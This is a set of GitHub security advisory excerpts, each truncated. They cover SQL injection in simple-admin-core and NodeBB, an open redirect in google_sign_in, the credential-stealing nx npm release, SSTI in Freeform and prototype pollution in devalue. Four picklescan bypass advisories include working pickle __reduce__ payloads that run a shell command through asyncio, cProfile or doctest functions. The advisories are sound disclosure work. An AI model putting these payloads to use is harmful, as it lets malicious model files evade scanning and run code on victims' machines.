ghsa

An issue was discovered in simple-admin-core v1.2.0 thru v1.6.7. The /sys-api/role/update interface in the simple-admin-core system has a limited SQL injection vulnerability, which may lead to partial data leakage or disruption of normal system operations.

NodeBB v4.3.0 is vulnerable to SQL injection in its search-categories API endpoint (/api/v3/search/categories). The search query parameter is not properly sanitized, allowing unauthenticated, remote attackers to inject boolean-based blind and PostgreSQL error-based payloads.

### Summary It is possible to craft a malformed URL that passes the "same origin" check, resulting in the user being redirected to another origin. ### Details The google_sign_in gem persists an optional URL for redirection after authentication. If this URL is malformed, it's possible for the user to be redirected to another origin after authentication, possibly resulting in exposure of authentication information such as the token. Normally the value of this URL is only written and read by the library. If applications are configured to store session information in a database, there is no known vector to exploit this vulnerability. However, applications may be configured to store this information in a session cookie, in which case it may be chained with a session cookie attack to inject a crafted URL. ### Impact Rails applications configured to store the `flash` information in a session cookie may be vulnerable, if this can be chained with an attack that allows injection of arbitra...

## Summary Malicious versions of the [`nx` package](https://www.npmjs.com/package/nx), as well as some supporting plugin packages, were published to npm, containing code that scans the file system, collects credentials, and posts them to GitHub as a repo under user's accounts. ## Affected Versions of `nx` - 21.5.0 - Published at 6:32 PM - 20.9.0 - 20.10.0 - 21.6.0 - 20.11.0 - 21.7.0 - 21.8.0 - 20.12.0 - Published at 8:37 PM These versions have since been removed from NPM as of 10:44 PM EDT ## Affected Versions of `@nx/devkit`, `@nx/js`, `@nx/workspace`, `@nx/node` - 21.5.0 - Published at 6:32 PM - 20.9.0 - Published at 8:42 PM ## Affected Versions of `@nx/eslint` - 21.5.0 - Published at 6:32 PM These versions have since been removed from NPM as of 10:44 PM EDT ## Affected Versions of `@nx/key` and `@nx/enterprise-cloud` - 3.2.0 only - Published at 6:32 PM These versions have since been removed from NPM as of 6:20 AM EDT ## Attack Vector At this time, we bel...

Freeform 5.0.0 to before 5.10.16, a plugin for CraftCMS, contains an Server-side template injection (SSTI) vulnerability, resulting in arbitrary code injection for all users that have access to editing a form (submission title).

## 1. `devalue.parse` allows `__proto__` to be set A string passed to `devalue.parse` could represent an object with a `__proto__` property, which would assign a prototype to an object while allowing properties to be overwritten: ```js class Vector { constructor(x, y) { this.x = x; this.y = y; } get magnitude() { return (this.x ** 2 + this.y ** 2) ** 0.5; } } const payload = `[{"x":1,"y":2,"magnitude":3,"__proto__":4},3,4,"nope",["Vector",5],[6,7],8,9]`; const vector = devalue.parse(payload, { Vector: ([x, y]) => new Vector(x, y) }); console.log("Is vector", vector instanceof Vector); // true console.log(vector.x) // 3 console.log(vector.y) // 4 console.log(vector.magnitude); // "nope" instead of 5 ``` ## 2. `devalue.parse` allows array prototype methods to be assigned to object In a payload constructed with `devalue.stringify`, values are represented as array indices, where the array contains the 'hydrated' values: ```js devalue.stringify({ message: 'hel...

### Summary Using asyncio.unix_events._UnixSubprocessTransport._start function, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to asyncio.unix_events._UnixSubprocessTransport._start function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` from asyncio.unix_events import _UnixSubprocessTransport from types import SimpleNamespace class EvilAsyncioUnixSubprocessTransportStart: def __reduce__(self): fake_self = SimpleNamespace( _loop=None, _protocol=None, _proc=None ) args = "whoami" return _UnixSubprocessTransport._start, ( fake_self, args,...

### Summary Using cProfile.run function, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to cProfile.run function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` import cProfile class EvilCProfileRun: def __reduce__(self): # cProfile.run(statement) -> Profile().run(statement) -> exec(statement) return cProfile.run, ("__import__('os').system('whoami')",) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when...

### Summary Using cProfile.runctx function, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to cProfile.runctx function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` import cProfile class EvilCProfileRunctx: def __reduce__(self): # cProfile.runctx(cmd, globals, locals) -> exec(cmd, ...) return cProfile.runctx, ("__import__('os').system('whoami')", None, None) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but execu...

### Summary Using doctest.debug_script function, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to doctest.debug_script function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` from doctest import debug_script class EvilDoctestDebugScript: def __reduce__(self): # debug_script(src, pm=True) -> exec(src, ...) return debug_script, ("__import__('os').system('whoami')", True) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetect...